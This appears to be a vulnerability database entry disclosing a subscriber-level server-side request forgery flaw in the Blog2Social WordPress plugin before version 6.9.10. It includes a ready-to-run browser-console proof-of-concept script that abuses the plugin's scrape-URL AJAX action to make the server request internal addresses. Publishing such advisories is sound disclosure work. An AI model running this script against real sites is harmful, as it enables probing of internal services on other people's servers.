WordPress Plugin Vulnerabilities
Blog2Social < 6.9.10 - Subscriber+ SSRF
Description
The plugin does not have authorisation in an AJAX action, and does not ensure that the URL to make a request to is an external one. As a result, any authenticated users, such as subscriber could perform SSRF attacks
Proof of Concept
Run this script in the web browser console while being logged in as a subscriber and on the Blog2Social Dashboard page (wp-admin/admin.php?page=blog2social) // Set this callback_url to the internal url you want the server to call callback_url = 'http://127.0.0.1:8080/'; wp_site_ajax_url = 'https://example.com/wp-admin/admin-ajax.php'; // Don't edit below data = new FormData(); data.append('action', 'b2s_scrape_url'); data.append('url', callback_url); data.append('b2s_security_nonce', jQuery('#b2s_security_nonce').val()); fetch(wp_site_ajax_url, { method: 'POST', credentials: 'same-origin', body: data });
Affects Plugins
References
CVE
Classification
Type
SSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Sakri Rafael Koskimies
Submitter
Sakri Rafael Koskimies
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-03 (about 1 years ago)
Added
2022-10-03 (about 1 years ago)
Last Updated
2022-10-03 (about 1 years ago)